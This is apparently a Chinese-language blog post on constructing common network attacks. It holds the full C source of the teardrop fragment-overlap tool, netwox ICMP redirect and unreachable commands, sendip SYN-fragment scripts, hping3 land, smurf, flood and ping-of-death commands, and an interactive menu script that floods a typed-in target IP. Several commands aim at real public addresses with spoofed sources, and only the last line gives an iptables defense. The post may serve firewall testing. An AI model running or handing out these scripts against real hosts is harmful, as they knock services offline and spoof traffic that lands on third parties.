【无标题】常见攻击构造方法

常见攻击

一、teardrop

将碎片数据包发送到目标机器。由于接收这些数据包的机器存在 TCP/IP 碎片重组错误而无法正确重新组装，这些数据包相互重叠，导致目标网络设备崩溃。
代码实现
#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <netdb.h>

#include <netinet/in.h>

#include <netinet/udp.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/socket.h>

#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING

/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */

#define FIX(n) (n)

#else

/* OpenBSD 2.1, all Linux */

#define FIX(n) htons(n)

#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */

#define IPH 0x14 /* IP header size */

#define UDPH 0x8 /* UDP header size */

#define PADDING 0x1c /* datagram frame padding for first packet */

#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */

#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can

* withstand maybe 5 or 10 sometimes... Experiment.*/

void usage(u_char *);

u_long name_resolve(u_char *);

void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    /*
     * Entry point. Positional arguments: argv[1] = source address,
     * argv[2] = destination address (dotted quad or host name, see
     * name_resolve()). Options handled by getopt(): -s source port,
     * -t destination port, -n number of fragment pairs. Ports left unset
     * are drawn from random(); an unset count falls back to COUNT.
     */
    int one = 1, count = 0, i, rip_sock;
    // source and destination addresses, as returned by name_resolve()
    u_long src_ip = 0, dst_ip = 0;
    // source and destination ports in host order; send_frags() applies htons()
    u_short src_prt = 0, dst_prt = 0;
    // scratch IPv4 address, used only to feed inet_ntoa() for the banner
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");
    // raw IP socket (requires raw-socket privilege); the kernel will not
    // build the IP header for us
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        fprintf(stderr, "raw socket");   // no newline and no errno text
        exit(1);
    }
    // IP_HDRINCL: the buffer handed to sendto() starts with a caller-built IP header
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
                   (char *)&one, sizeof(one))< 0)
    {
        fprintf(stderr, "IP_HDRINCL");
        exit(1);
    }
    // the argument check comes after socket creation, so even a bad command
    // line needs raw-socket privilege before usage() is reached
    if (argc < 3)
        usage(argv[0]);
    // resolve both positional addresses; name_resolve() returns 0 on failure
    if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }
    // options are parsed only after the two positional addresses were resolved
    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
        case 's': // source port (should be emphemeral)
            src_prt = (u_short)atoi(optarg);
            break;
        case 't': // dest port (DNS, anyone?)
            dst_prt = (u_short)atoi(optarg);
            break;
        case 'n': // number to send
            count = atoi(optarg);
            break;
        default :
            usage(argv[0]);
            break; // NOTREACHED
        }
    }
    // NOTE(review): the seed is the return value of utimes() (a file-timestamp
    // call, given "0" as the path), not a clock; presumably the port values
    // chosen below therefore do not vary with time
    srandom((unsigned)(utimes("0",(time_t)0)));
    // unset ports get a pseudo-random value; an unset count uses COUNT
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)
        count = COUNT;
    // banner; inet_ntoa() wants a struct in_addr, hence the copies into addr
    printf("Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    printf(" Amt: %5d\n", count);
    printf("[\n ");
    // each iteration sends one pair of fragments (see send_frags()), 500 us apart
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        // printf("b00m ");
        usleep(500);
    }
    printf("]\n");
    // rip_sock is never closed explicitly; the process exits right after
    return (0);
}

// 设置 IP 包的内容

// Builds one IP datagram (20-byte IP header + 8-byte UDP header + PADDING
// bytes of payload) in a heap buffer and sends it twice through the raw
// socket: first as a 56-byte fragment at offset 0 with MF set, then again
// with the header rewritten to a 24-byte fragment at offset MAGIC and MF
// cleared. Both pieces share IP id 242, and the second lies entirely inside
// the byte range the first already covered — the overlapping-fragment
// pattern that fragment-reassembly checks (IDS preprocessors, stateful
// firewalls) flag as a teardrop signature.
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
    u_char byte; // a byte
    // destination for sendto(); sin_port is stored without htons() —
    // NOTE(review): presumably irrelevant with IP_HDRINCL, since the ports
    // actually transmitted are the ones written into the UDP header below
    struct sockaddr_in sin; /* socket protocol structure */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;
    // 0x14 + 0x8 + 0x1c = 56 bytes; NOTE(review): the malloc result is not checked
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;   // write cursor
    flag = packet;    // read cursor for the hex dump further down
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    // IP version and header length: version 4, IHL 5 (20 bytes, no options)
    byte = 0x45;
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; // IP TOS (skipped)
    // total length
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    // IP id: a fixed constant, identical for both fragments (and every run)
    *((u_short *)p_ptr) = htons(242); // IP id
    p_ptr += 2;
    //IP frag flags and offset: MF set, offset 0 — the first fragment
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    // 16-bit store starting at the TTL byte; on a little-endian host this
    // leaves TTL = 64 and zeroes the next byte, which the protocol byte then fills
    *((u_short *)p_ptr) = 0x40; // IP TTL
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    // IP checksum filled in by kernel
    p_ptr += 4;
    // IP source address
    // NOTE(review): u_long is 8 bytes on LP64 platforms, so each of these two
    // stores writes 8 bytes; the code assumes a 32-bit long
    *((u_long *)p_ptr) = src_ip;
    p_ptr += 4;
    // IP destination address
    *((u_long *)p_ptr) = dst_ip;
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); // UDP source port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); // UDP destination port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(PADDING); // UDP total length
    p_ptr += 4;   // skips the UDP checksum, which stays 0 from bzero()
    // payload: the ASCII bytes of "Fake News", each written as a 16-bit store
    // one byte apart (each store overwrites the high byte of the previous one)
    *((u_short *)p_ptr) = 0x46;
    p_ptr++;
    *((u_short *)p_ptr) = 0x61;
    p_ptr++;
    *((u_short *)p_ptr) = 0x6B;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x20;
    p_ptr++;
    *((u_short *)p_ptr) = 0x4E;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x77;
    p_ptr++;
    *((u_short *)p_ptr) = 0x73;
    // hex dump of the whole 56-byte buffer to stdout, 8 bytes per line
    int i=1;
    while(i <= 56)
    {
        printf("%x\t",*flag);
        flag++;
        if(0 == i%8)
            printf("\n");
        i++;
    }
    // first fragment: all 56 bytes
    if (sendto(sock, packet, IPH + UDPH + PADDING, 0,
               (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    // IP total length is 2 bytes into the header: now 24 bytes (header + 4 of payload)
    p_ptr = &packet[2];
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    // IP offset is 6 bytes into the header; plain assignment, so IP_MF is
    // cleared — this piece claims to be the last fragment
    p_ptr += 4;
    *((u_short *)p_ptr) = FIX(MAGIC);
    // second fragment: same buffer, only its first 24 bytes
    if (sendto(sock, packet, IPH+MAGIC+1, 0,
               (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

// 获取主机信息

// Resolves host_name to an IPv4 address: dotted-quad form via inet_addr()
// first, otherwise a gethostbyname() lookup. Returns 0 when the lookup fails;
// callers treat 0 as failure, which also rules out 0.0.0.0 as an input.
// NOTE(review): inet_addr() signals failure with -1 (INADDR_NONE), so the
// valid address 255.255.255.255 is indistinguishable from a parse error here
// and is handed to gethostbyname() as well.
u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        // first address of the answer, h_length bytes long
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

// Prints the command-line synopsis to stderr and exits with status 0
// (main() also calls this for option errors, so those exit "successfully").
void usage(u_char *name)
{
    fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);
    exit(0);
}

二、tcp flag 异常攻击

同时对flag中的多个标志进行置位操作
使用ipop工具中的tcp,四个选项都勾选,可以构造tcp flag异常报文

三、ping

发送icmp分片包,可以用下面的命令
ping -f -s 65507 114.114.114.114
65507是包的长度

四、icmp重定向和icmp不可达

icmp重定向:
伪装成主机默认网关发送icmp重定向报文到主机,让主机更改路由表信息,从而达到攻击的目的
ubuntu下使用netwox工具,命令如下:
netwox 86 -f “host 192.168.1.17” -g “192.168.1.19” -i 192.168.1.1
-f 被攻击主机
-g 重定向包需要被攻击者修改的新路由
-i 被攻击者原来的路由

icmp不可达攻击
netwox 82 -f “host 192.168.1.17” -i “192.168.1.1”
-f 被攻击者
-i 被攻击者当前的路由

五、带源路由选项的ip报文攻击

通过在ip选项中添加合法的ip地址,蒙混进入网络,进行攻击;

六、tcp-syn分片

如下脚本和命令结合

root@ubuntu:/home/wjq# 
export  a=6798;
while true;do ./syn_frag.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1;let a++;done;^C
root@ubuntu:/home/wjq# cat syn_frag.sh 
#!/bin/sh
# Emits four packets with sendip. $1 = source address, $2 = source port,
# $3 = destination address, $4 = destination port, $5 = the host the packets
# are actually handed to (the gateway in the transcript above). The first
# three set the IP "more fragments" bit (-ifm 1), the fourth clears it; each
# carries a TCP SYN (-tfs 1). Arguments are used unvalidated.
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 0 -p tcp -ts $2 -td $4 -tfs 1 $5

七、带数据的tcp-syn攻击

用如下脚本可以构造出包

root@ubuntu:/home/wjq# ./tcp_sys_data.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1^C
root@ubuntu:/home/wjq# cat tcp_sys_data.sh 
#!/bin/sh
# One TCP SYN with a 5-byte payload (-d) via sendip. $1 = source address,
# $2 = source port, $3 = destination address, $5 = the host the packet is
# handed to. The TCP destination port (-td) is also given $3; $4 is not used.
sendip -v -p ipv4 -is $1 -id $3 -p tcp -ts $2 -td $3 -tfs 1 -d 0xcdcdcdcdcd $5

八、死亡之ping

ping -f -s 65507 114.114.114.114

九、攻击验证方法

九.1 land攻击

使用linux下的hping3工具可以达到攻击效果,命令如下:

tcp
hping3 -S  -p 80 14.215.178.78 -a 14.215.178.78 --flood

– -S tcp-syn
– -p 80 目标端口
– 14.215.178.78 攻击的目标ip
– -a 14.215.178.78 伪装成目标ip
– --flood 以泛洪方式发送

tcp-syn-land

root@ubuntu:/home/sfg# cat tcp_syn_land.sh 
#!/bin/bash

# hping3 wrapper: TCP SYNs to port $2 of $1 whose source address is $1 itself
# (-a), sent as fast as possible (--flood) until interrupted.
# Positional arguments are passed through unvalidated.
function tcp_syn_land()
{
	local victim_ip=$1
	local victim_port=$2
	hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood
}

tcp_syn_land $*

udp-land

hping3 -2  -p 80 14.215.178.78 -a 14.215.178.78 --flood

– -2 表示udp,默认是tcp

icmp
root@ubuntu:/home/wjq# while true;do sendip -v -p ipv4 -is 14.215.178.78 -id 14.215.178.78 -p icmp -d $b 192.168.68.1;let b+=1;done;
root@ubuntu:/home/wjq# echo $b
56249

九.2 flood攻击

tcp泛洪攻击

hping3 -S --rand-source 14.215.178.78 --flood 

icmp泛洪

hping3 -1 --rand-source 14.215.178.78 --flood

udp泛洪

hping3 -2 --rand-source 14.215.178.78 --flood

tcp-syn flood

hping3 -S -p 80 --rand-source 14.215.178.78 --flood

tcp-syn分片

hping3 -c 5 -S -p 80 -x -a 192.167.45.67 14.215.178.78;hping3 -c 1 -S -p 80 -a 192.167.45.67 14.215.178.78

icmp flood

hping3 -1 --rand-source 14.215.178.78 --flood

死亡之ping

root@ubuntu:/home/sfg# cat ping_of_death.sh 
#!/bin/bash

# hping3 wrapper: one ICMP fragment with the MF bit set, followed by 50 more,
# each placed icmp_size bytes further on. Every fragment carries the same IP
# id (186) and every one, including the last, is sent with --morefrag.
# $1 = destination address, unvalidated.
function ping_of_death()
{
	local victim_ip=$1
	local id=186            # IP identification shared by all fragments
	local data_size=1450    # ICMP payload bytes per fragment
	let icmp_size=${data_size}+8    # payload plus the 8-byte ICMP header
	hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag
	for i in $(seq 50)
	do
		let offset=${i}*${icmp_size}    # byte offset of this fragment
		hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
	done
}

ping_of_death $*

smurf

root@ubuntu:/home/sfg# cat smurf.sh 
#!/bin/bash
# hping3 wrapper: ICMP echo flood to $2 (intended as a broadcast address)
# with the source address forged as $1, so replies go to $1. Runs until
# interrupted; arguments are unvalidated.
function smurf()
{
	local victim_ip=$1
	local broadcast_ip=$2
	hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}
smurf $*

teardrop

root@ubuntu:/home/sfg# cat teardrop.sh 
#!/bin/bash

# hping3 wrapper: three ICMP fragments under IP id 186 — 1480 bytes of data
# with MF at offset 0, 1480 bytes with MF at offset 240, then 648 bytes
# without MF at offset 18960. $1 = destination address, unvalidated.
function icmp_teardrop()
{
	local dst_ip=$1
	local id=186    # IP identification shared by the three fragments
	hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag
	hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
	hping3 --icmp ${dst_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}

icmp_teardrop $*

tcp-syn分片

root@ubuntu:/home/sfg# cat tcp_syn_frag.sh 
#!/bin/bash

# hping3 wrapper: three fragments of a TCP segment with SYN and URG set
# (-S is given twice, -U) to port 80 of $1, each with a random source
# address (--rand-source): MF set at offsets 0 and 1480, final piece at 2960.
# $1 = destination address, unvalidated.
function tcp_syn_frag()
{
	local dst_ip=$1
	hping3 -S ${dst_ip} --morefrag --count 1 -S -U --destport 80 --data 1480 --rand-source
	hping3 -S ${dst_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport 80 --data 140 --rand-source
	hping3 -S ${dst_ip} --fragoff 2960 --count 1 -S -U --destport 80 --data 140 --rand-source
}

tcp_syn_frag $*

攻击脚本

#!/bin/bash
# Interactive hping3 wrapper. `handle` (called at the bottom with the script's
# arguments) dispatches on $1 — "1".."10" or "-h" — to one of the functions
# below; each prompts on stdin for its target and then runs one or more hping3
# commands. Typed values are used unvalidated and unquoted. Anything else
# falls through to `usage`, which prints the menu and re-dispatches on what
# is typed next.

# 1: three fragments of a SYN+URG segment to dest_port on dest_ip (MF set on
# the first two), random source addresses
function tcp_syn_frag()
{
	echo "Welcome  tcp_syn_frag"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	#local dest_ip=$1
	hping3 -S ${dest_ip} --morefrag --count 1 -S -U --destport ${dest_port} --data 1480 --rand-source
	hping3 -S ${dest_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
	hping3 -S ${dest_ip} --fragoff 2960 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
}

# 2: three ICMP fragments sharing IP id 186 (MF on the first two; offsets
# 0, 240 and 18960)
function icmp_teardrop()
{
	echo "Welcome  icmp_teardrop"
	echo "enter tattck target ip:"
	read dest_ip
	local id=186
	hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag
	hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
	hping3 --icmp ${dest_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}


# 3: ICMP echo flood to broadcast_ip with the source forged as dest_ip;
# runs until interrupted
function icmp_smurf()
{
	echo "Welcome  icmp_smurf"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target broadcast ip"
	read broadcast_ip
	hping3 --icmp ${broadcast_ip} -a ${dest_ip} --flood
}


# 4: 51 ICMP fragments under IP id 186, every one sent with --morefrag,
# each icmp_size (data_size + 8) bytes further on than the previous
function ping_of_death()
{
	echo "Welcome  ping_of_death"
	echo "enter aattack target ip:"
	read dest_ip
	local id=186
	local data_size=1450
	let icmp_size=${data_size}+8
	hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag
	for i in $(seq 50)
	do
		let offset=${i}*${icmp_size}
		hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
	done
}

# 5: SYN flood to dest_port on dest_ip from random source addresses;
# runs until interrupted
function tcp_syn_flood()
{
	echo "Welcome  tcp_syn_flood"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -S -p ${dest_port} --rand-source ${dest_ip} --flood
}


# 6: UDP flood (-2) from random source addresses; runs until interrupted
function udp_flood()
{
	echo "Welcome  udp_flood"
	echo "enter attack tartget ip:"
	read dest_ip
	hping3 -2 --rand-source ${dest_ip} --flood
}


# 7: ICMP flood (-1) from random source addresses; runs until interrupted
function icmp_flood()
{
	echo "Welcome  icmp_flood"
	echo "enter attack target ip:"
	read dest_ip
	hping3 -1 --rand-source ${dest_ip} --flood
}

# 8: SYN flood to hping3's default port from random source addresses;
# runs until interrupted
function tcp_flood()
{
	echo "Welcome  tcp_flood"
	echo "enter attack target ip:"
	read dest_ip
	hping3 -S --rand-source ${dest_ip} --flood
}

# 9: SYNs to dest_port on dest_ip with the source address set to dest_ip
# itself (-a); runs until interrupted
function tcp_syn_land()
{
	echo "Welcome  tcp_syn_land"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -S  -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}


# 10: same as 9 but UDP (-2)
function udp_land()
{
	echo "Welcome  udp_land"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -2  -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}
# Prints $1 (the unrecognised selector, or "-h"; empty when called from the
# default branch of `handle`) followed by the menu, reads a selection from
# stdin and hands it back to `handle` — so an invalid entry keeps prompting.
usage()
{
	echo $1
	echo "Usage:"
	echo "	./test_script.sh [one of Support attack lists]"
	echo "Support attack lists:"
	echo "	1 tcp_syn_frag"
	echo "	2 icmp_teardrop"
	echo "	3 icmp smurf"
	echo "	4 ping_of_death"
	echo "	5 tcp_syn_flood"
	echo "	6 udp_flood"
	echo "	7 icmp_flood"
	echo "	8 tcp_flood"
	echo "	9 tcp_syn_land"
	echo "	10 udp_land"
	echo "selcet:"
	read secect
	handle ${secect}
}


# Dispatcher: maps the selector in $1 to one of the functions above; only
# "-h" forwards its arguments to `usage`, the default branch calls it bare.
function handle()
{
	case $1 in
	"-h")
		usage $*
		;;
	"1")
		tcp_syn_frag
		;;
	"2")
		icmp_teardrop
		;;
	"3")
		icmp_smurf
		;;
	"4")
		ping_of_death
		;;
	"5")
		tcp_syn_flood
		;;
	"6")
		udp_flood
		;;
	"7")
		icmp_flood
		;;
	"8")
		tcp_flood
		;;
	"9")
		tcp_syn_land
		;;
	"10")
		udp_land
		;;
	*)
		usage
		;;
	esac
}

# entry point: the script's own arguments select the action
handle $*


tcp类防御方法

限制到同一目的ip的并发连接数量最大为5个（按目的地址统计，超出后新的SYN将被丢弃）
iptables -I FORWARD -p tcp --syn --dport 80 -m connlimit --connlimit-above 5 --connlimit-daddr -j DROP